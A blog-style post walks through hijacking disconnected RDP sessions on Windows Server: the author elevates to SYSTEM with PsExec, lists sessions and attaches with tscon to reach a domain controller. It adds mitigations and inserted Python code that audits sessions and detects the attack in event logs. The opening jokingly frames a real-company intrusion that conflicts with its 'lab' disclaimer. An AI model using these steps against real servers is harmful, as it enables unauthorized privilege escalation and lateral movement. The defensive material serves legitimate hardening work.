I was poking around on a routine scan—purely for educational reasons 😇—when one IT staffer’s workstation practically invited me in.
A quick credential dump landed me local-admin, and there they were: six RDP sessions quietly ticking away because he never hits Sign out.
This “pivot” user had connections to half the company’s servers, so one tscon dropped me straight onto the Domain Controller.
All that risk, born from a single habit: closing the window instead of logging off.
Before we dive into the technical walkthrough, let’s recap why a dangling RDP session is even a thing.

## 1. Background
Remote Desktop Protocol (RDP) spawns a user session on the target server.
If you log off, that session is destroyed.
If you merely close the RDP client, the session flips to Disconnected (Disc) and sits in RAM—programs keep running, credentials stay cached.
On Windows Server 2016 and earlier, tscon.exe allows a process running as NT AUTHORITY\SYSTEM to attach to any live session without knowing its password.
## 2. Lab Walk‑through: Hijacking a Disconnected Session

### 2.1 – Enumerate & understand your current role
### 2.2 – Elevate to SYSTEM

```cmd
:: run from an elevated cmd (Run as Administrator)
C:\tools\PsExec64.exe -s cmd.exe
```

- `-s` ▸ launches the new cmd.exe as SYSTEM.
### 2.3 – List RDP sessions

```cmd
C:\> query user
 USERNAME              SESSIONNAME        ID  STATE   IDLE TIME  LOGON TIME
>administrator         rdp-tcp#6           2  Active          .  04/01/2022 04:09
 DC                                        3  Disc            .  04/06/2022 06:51
```

- `administrator` (you) is Active on session 2.
- Session 3 is in `Disc` state—perfect target.
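The same `query user` output is what a defender should be auditing, not just an attacker. Below is an added example (my own code, not part of the original post) that parses that table, lists every `Disc` session and flags those whose idle time already exceeds the 15‑minute disconnect timeout recommended later in this post. The sample text is constructed from the two rows above plus an invented `svc_backup` row so the idle‑time format (`days+hours:minutes`) is exercised.

```python
"""Audit `query user` output for dangling (Disconnected) RDP sessions.

Added example: a small parser for the `query user` table, so an admin can
flag Disc sessions before an attacker finds them. SAMPLE_QUERY_USER is
constructed; the svc_backup row is invented to show the idle-time format.
"""
from dataclasses import dataclass
from datetime import datetime
from typing import List


@dataclass
class RdpSession:
    username: str
    session_name: str      # empty for a Disc session: no transport is attached
    session_id: int
    state: str             # "Active" or "Disc"
    idle: str              # raw IDLE TIME column: ".", "45", "1:23" or "2+03:15"
    logon_time: datetime
    is_current: bool       # the row prefixed with ">" is the caller's own session


# Constructed sample (the two rows from the walkthrough plus one invented row).
SAMPLE_QUERY_USER = """\
 USERNAME              SESSIONNAME        ID  STATE   IDLE TIME  LOGON TIME
>administrator         rdp-tcp#6           2  Active          .  04/01/2022 04:09
 DC                                        3  Disc            .  04/06/2022 06:51
 svc_backup                                4  Disc      2+03:15  03/30/2022 22:10
"""


def parse_query_user(text: str) -> List[RdpSession]:
    """Parse `query user` rows; SESSIONNAME is the only column that may be blank."""
    sessions = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("USERNAME"):
            continue
        is_current = line.startswith(">")
        tokens = line.lstrip(">").split()
        # Walk from the right: LOGON TIME is two tokens, then IDLE, STATE, ID.
        logon_time = datetime.strptime(f"{tokens[-2]} {tokens[-1]}", "%m/%d/%Y %H:%M")
        idle, state, session_id = tokens[-3], tokens[-4], int(tokens[-5])
        session_name = tokens[1] if len(tokens) == 7 else ""
        sessions.append(RdpSession(tokens[0], session_name, session_id, state,
                                   idle, logon_time, is_current))
    return sessions


def idle_minutes(idle: str) -> int:
    """Convert IDLE TIME to minutes: '.'/'none' = 0, 'D+H:MM', 'H:MM' or plain minutes."""
    if idle in (".", "none"):
        return 0
    days = 0
    if "+" in idle:
        day_part, idle = idle.split("+", 1)
        days = int(day_part)
    if ":" in idle:
        hours, minutes = idle.split(":", 1)
        return days * 1440 + int(hours) * 60 + int(minutes)
    return days * 1440 + int(idle)


def dangling_sessions(sessions: List[RdpSession]) -> List[RdpSession]:
    """Every Disc session is a finding: cached credentials, programs still running."""
    return [s for s in sessions if s.state == "Disc"]


def stale_sessions(sessions: List[RdpSession], max_idle_minutes: int = 15) -> List[RdpSession]:
    """Disc sessions that have already outlived the timeout the GPO would enforce."""
    return [s for s in dangling_sessions(sessions) if idle_minutes(s.idle) > max_idle_minutes]


if __name__ == "__main__":
    found = parse_query_user(SAMPLE_QUERY_USER)
    for s in dangling_sessions(found):
        print(f"session {s.session_id} ({s.username}) is Disc, idle {idle_minutes(s.idle)} min, "
              f"logged on {s.logon_time:%Y-%m-%d %H:%M}")
```

To run it against a live host, pipe the real `query user` output into `parse_query_user` instead of the constructed sample; a `Disc` row with a blank `SESSIONNAME` is exactly the state the walkthrough exploits.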
### 2.4 – Steal X’s Session to Land on the DC

```cmd
tscon 3 /dest:rdp-tcp#6
```

- `3` ▸ the ID of X’s session.
- `/dest:rdp-tcp#6` ▸ your own transport channel (see SESSIONNAME in the `query user` output).

The RDP window instantly flips to the Domain Controller’s desktop, programs and all—no password prompt.
But on the bright side, they had a virtually uncrackable DC password.
## 3. Why This Is Dangerous
| Risk | Impact |
|---|---|
| Privilege escalation | Hijacker inherits the victim’s rights—often Domain Admin. |
| Silent lateral movement | No new logon events; looks like the legit user is still logged in. |
| Data exposure | Open Outlook, KeePass, RDP files—all ready for the taking. |
| Operational disruption | Hijacker can run ransomware as the victim, masking attribution. |
## 4. Mitigations & Best Practices

- **Always log off** — teach admins to hit **Start → Sign out**.
- **Idle session limits** — GPO: Computer Config → Policies → Admin Templates → Windows Components → Remote Desktop Services → Session Time Limits. Set “End a disconnected session” to e.g. 15 minutes.
- **Deny tscon hijack** — Server 2019+ prompts for the user’s password when attaching to another session.
- **Restrict SYSTEM escalation** — Block or alert on PsExec/WMI with Defender ASR rule 56. Deploy AppLocker / WDAC to deny unsigned admin tools.
- **Monitor Event 7045 & 4778** — Detect rogue service installs (`psexesvc`) and unexpected session re‑connections.
- **MFA for admin RDP** — Even if a token is hijacked, MFA blocks fresh privileged logons.
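The “Monitor Event 7045 & 4778” item above is the one that catches this technique in flight, so here is an added example (my own code, not from the original post) of what that detection looks like. It takes normalized event records and flags (a) any 7045 service install whose name or binary is PsExec’s `PSEXESVC`, and (b) any 4778 session reconnect that either comes from a client name never seen for that account or follows a `PSEXESVC` install on the same host within a short window. The event records, hostnames, accounts and client names are constructed; a real deployment would map `Get-WinEvent` or SIEM fields onto the same keys first.

```python
"""Detection logic for the two log indicators named in the mitigations above.

Added example, not from the original post. Event records are constructed and
already normalized to flat dicts (a SIEM or Get-WinEvent export would need to
be mapped onto these keys first):
  - id 7045 (System log): a new service was installed; PsExec registers PSEXESVC.
  - id 4778 (Security log): a session was reconnected to a Window Station.
Hostnames, accounts and client names below are invented.
"""
from datetime import datetime, timedelta
from typing import Dict, List, Set

EVENTS = [
    {"time": "2022-04-06T07:01:00", "host": "DC01", "id": 7045,
     "service_name": "PSEXESVC", "image_path": r"%SystemRoot%\PSEXESVC.exe"},
    {"time": "2022-04-06T07:02:30", "host": "DC01", "id": 4778, "account": "DC",
     "session_name": "rdp-tcp#6", "client_name": "ITSTAFF-WS01", "client_address": "10.0.5.23"},
    {"time": "2022-04-06T09:15:00", "host": "FS01", "id": 4778, "account": "administrator",
     "session_name": "rdp-tcp#2", "client_name": "ADMIN-LAPTOP", "client_address": "10.0.1.8"},
    {"time": "2022-04-06T09:40:00", "host": "FS01", "id": 7045,
     "service_name": "BackupAgentSvc", "image_path": r"C:\Program Files\Backup\agent.exe"},
]

# Baseline of RDP client names each admin account normally reconnects from (constructed).
KNOWN_CLIENTS: Dict[str, Set[str]] = {"DC": {"DCADMIN-WS"}, "administrator": {"ADMIN-LAPTOP"}}


def _ts(event: dict) -> datetime:
    return datetime.fromisoformat(event["time"])


def rogue_service_installs(events: List[dict]) -> List[dict]:
    """7045 events whose service name or binary path is PsExec's PSEXESVC."""
    return [e for e in events if e["id"] == 7045
            and "psexesvc" in (e["service_name"] + e["image_path"]).lower()]


def suspicious_reconnects(events: List[dict], known_clients: Dict[str, Set[str]],
                          window: timedelta = timedelta(minutes=10)) -> List[dict]:
    """4778 reconnects that are unexpected for one of two reasons:
    (a) the client name was never seen for that account, or
    (b) PSEXESVC was installed on the same host shortly before (the SYSTEM + tscon pattern)."""
    installs = rogue_service_installs(events)
    findings = []
    for e in events:
        if e["id"] != 4778:
            continue
        reasons = []
        if e["client_name"] not in known_clients.get(e["account"], set()):
            reasons.append(f"reconnect from unknown client {e['client_name']}")
        for inst in installs:
            delta = _ts(e) - _ts(inst)
            if inst["host"] == e["host"] and timedelta(0) <= delta <= window:
                minutes = int(delta.total_seconds() // 60)
                reasons.append(f"PSEXESVC installed on {e['host']} {minutes} min earlier")
        if reasons:
            findings.append({"time": e["time"], "host": e["host"], "account": e["account"],
                             "session_name": e["session_name"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in suspicious_reconnects(EVENTS, KNOWN_CLIENTS):
        print(f"{f['time']} {f['host']} {f['account']} {f['session_name']}: "
              + "; ".join(f["reasons"]))
```

On the sample data only the `DC` reconnect on `DC01` is flagged, and for both reasons at once; the `administrator` reconnect from its usual laptop and the benign backup-agent service install stay quiet. The client-name baseline is the part worth investing in: a reconnect of a privileged account from a workstation it has never used is exactly what a `tscon` hijack from a compromised IT workstation looks like in the Security log.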
## 5. Server 2019 and Later
Server 2019/2022 changed tscon behaviour—SYSTEM can no longer attach to another user’s session without supplying that user’s credentials.
Still enforce log‑off discipline: the session keeps consuming RAM/CPU and may be exposed by future privilege‑escalation exploits.
## 6. Key Take‑aways

- Disconnect ≠ Log off—your session remains a loaded gun on the server.
- Attackers with SYSTEM can pull the trigger in one line of PowerShell or `tscon`.
- Good hygiene (log off), sensible timeouts, and modern hardening (ASR, WDAC) shut this door.
Stay safe, and make “Sign out” your new muscle memory! 🛡️
## References

- Microsoft Docs – `tscon` command
- Sysinternals PsExec
- [MITRE ATT&CK – T1563.002: Remote Services > RDP Hijacking](https://attack.mitre.org/techniques/T1563/002)

*And as always, all of this was done safely in a lab environment.*